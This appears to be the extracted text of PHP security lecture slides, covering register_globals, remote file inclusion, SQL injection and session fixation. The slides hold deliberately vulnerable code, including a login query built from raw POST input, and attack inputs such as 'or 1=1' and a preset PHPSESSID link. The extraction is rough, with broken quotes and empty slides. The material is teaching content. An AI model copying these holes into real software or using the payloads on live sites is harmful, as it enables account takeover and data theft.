PHP Security

Computer Security

overview

Xss , Css

Register_globals

Data Filtering

Sql Injection

Session Fixation

Cross Site Scripting

The goal of the CSS attack is to steal the client cookies, or any other sensitive information,which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user.

(attention to the sample)

Another sample

Another sample (cont)

Prevent

Register_globals Poor Security

<?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include “Access.php”; } ?>

Login.php?authorized=1

Login.php

RisK

Register_globals Poor Security

<?php include "$path/script.php";?>

RisK

Run.php?path=http%3A%2F%2Fwww.mysite.com%2F%3F

Run.php

<?php include 'http://www.mysite.com/?/script.php';?>

If allow_url_fopen is enabled (which it is by default, even in php.ini recommended),this will include the output of http://www.mysite.com/ just as if it were a local file

Data Filtering

Filtering Examples

The following validates an email address:

<?php $clean = array(); $email_pattern ='/^[^@\s]+@([-a-z0-9]+\.)+[a-z]{2,}$/i'; if (preg_match($email_pattern, $_POST['email'])) { $clean['email'] = $_POST['email']; }?>

Data Filtering

Filtering Examples

The following example ensures that $_POST['num'] is an integer:

<?php $clean = array(); if ($_POST['num'] == strval(intval($_POST['num']))) { $clean['num'] = $_POST['num']; }?>

The following example ensures that $_POST['num'] is a float:

<?php $clean = array(); if ($_POST['num']==strval(floatval($_POST['num']))) { $clean['num'] = $_POST['num']; }?>

Databases and SQLInput The User_name and Password in file Outside Webroot folder:Test/conn

SetEnv DB_USER " myuser"SetEnv DB_PASS “1234“SetEnv DB_HOST “myhost”

Include this file within httpd.conf as follows: Include “Test/conn"

phpinfo() or print_r($_SERVER).

Be careful not to expose these variables with something like

<?php //db.inc $db =mysql_connect($_SERVER['DB_HOST'],$_SERVER['DB_USER'],$_SERVER['DB_PASS']);

>?

SQL InjectionWHERE Hacking

<?php

//if(isset($_POST['submit'])) {

$db = mysql_connect("localhost", "Hawk","3"); mysql_select_db("user",$db); //echo $db; // echo $_POST['user']; $sql="select * from user where UserName='".$_POST['user']."'"."'and Pass='".$_POST['pass']."'"; //echo $sql; $result=mysql_query($sql); while($row=mysql_fetch_array($result)){ echo "<h4> Name: " . $row["UserName"] . ', ' . $row["Pass"] . "</h4> \n"; }

mysql_close(); // } // else //echo "Nothing"; ?>

SQL Injection

Select * from user where UserName=ym and Pass=2 or 1=1

$sql="select * from user where UserName='".$_POST['user']‘"."'".and Pass='".$_POST['pass'];"'".

select * from user where UserName='ym'and Pass='ym'

select * from user where UserName='ym‘ ;--and Pass'‘=

Injected Select

Prevent

•Using Store Procedures•ctype_alnum — Check for alphanumeric character(s)

•ctype_alpha — Check for alphabetic character(s)

•mysql_real_escape_string — Escapes special characters in a string for use in a SQL statement

Session Fixation

There are three common methods used to obtain by an attacker to valid session identifier:

1. PredictionPrediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation.

2 .Capture

3. Fixation

Capturing a valid session identifier is the most common type of session attack,and there are numerous approaches. Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been Internet Explorer, and cookies are slightly less exposed than GET variables. Thus, for those users who enable cookies, you can provide them with a more secure mechanism.

In the simplest case, a session fixation attack can use a link:<a href="http://host/index.php?PHPSESSID=1234">Click here </a>Or a protocol-level redirect:<?php header(‘Location: http://host/index.php?PHPSESSID=1234’);?>

Session Fixation

<?php session_start(); if (!isset($_SESSION['visits'])) { $_SESSION['visits'] = 1; } else { $_SESSION['visits']++; } echo $_SESSION['visits'];?>

Session Fixation